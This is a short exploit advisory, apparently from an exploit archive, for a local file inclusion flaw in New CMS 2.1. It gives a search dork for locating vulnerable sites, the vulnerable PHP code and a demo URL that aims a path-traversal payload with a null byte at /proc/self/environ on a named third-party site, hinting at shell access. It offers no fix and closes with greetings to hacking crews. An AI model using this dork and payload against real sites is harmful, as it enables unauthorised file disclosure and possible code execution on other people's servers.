New CMS version 2.1 suffers from a local file inclusion vulnerability.
26b93c8a8cc6dbb8ec52f0210258d68239e0acf6e87359bc67630c70164293cd
===============================================
[+] TITLE : NEW CMS Local File Inclusion Vulnerability (/proc/self/environ)
[+] VENDOR : http://new-cms.org/index.php?lng=it&mod=download&pg=indice
[+] VERSION : 2.1 or Later
[+] AUTHOR : R3vanBastard
[+] TESTED ON : Windows
[+] DORK : "New CMS" inurl:index.php?lng=
[+] YM : revan_blezinsky[at]yahoo.com
==================[+]VULN[+]===================
if (get_magic_quotes_gpc()) {
$process = array(&$_GET, &$_POST, &$_COOKIE, &$_REQUEST);
while (list($key, $val) = each($process)) {
foreach ($val as $k => $v) {
unset($process[$key][$k]);
if (is_array($v)) {
$process[$key][stripslashes($k)] = $v;
$process[] = &$process[$key][stripslashes($k)];
} else {
$process[$key][stripslashes($k)] = stripslashes($v);
}
}
}
unset($process);
}
define("PER", "");
include(PER."cdat.php");
include(PER."struttura/funzioni.str"); //inclusione file con le funzioni e costanti principali
include(CGEN."config".DTB); // inclusione file di configurazione
if(strlen(dirname($_SERVER["SCRIPT_NAME"]))>1) { $DirName = dirname($_SERVER["SCRIPT_NAME"])."/"; } else { $DirName = "/"; }
$sito[2] = "http://".$_SERVER["SERVER_NAME"].$DirName;
$CMSVersion = "New-CMS 2.1";
if(isset($_GET['mod'])) $_GET['mod'] = Prot($_GET['mod']);
if(isset($_GET['pg'])) $_GET['pg'] = Prot($_GET['pg']);
if(isset($_GET['s'])) $_GET['s'] = Prot($_GET['s']);
if(isset($_GET['lng'])) {
if(strlen($_GET['lng'])>2) unset($_GET['lng']);
}
============================================================
[DEMO] http://www.salvatorecotena.it/index.php?lng=../../../../../../../../../../../../../proc/self/environ%0000 [shell? ]
===================================================================
Thanks to: My PC | Jogjamakeup.com | Mainhack |VOP CREW| Jack | rdnc.or.id |
BoBy a.k.a c0li(yg botnya di gangbang)
===================================================================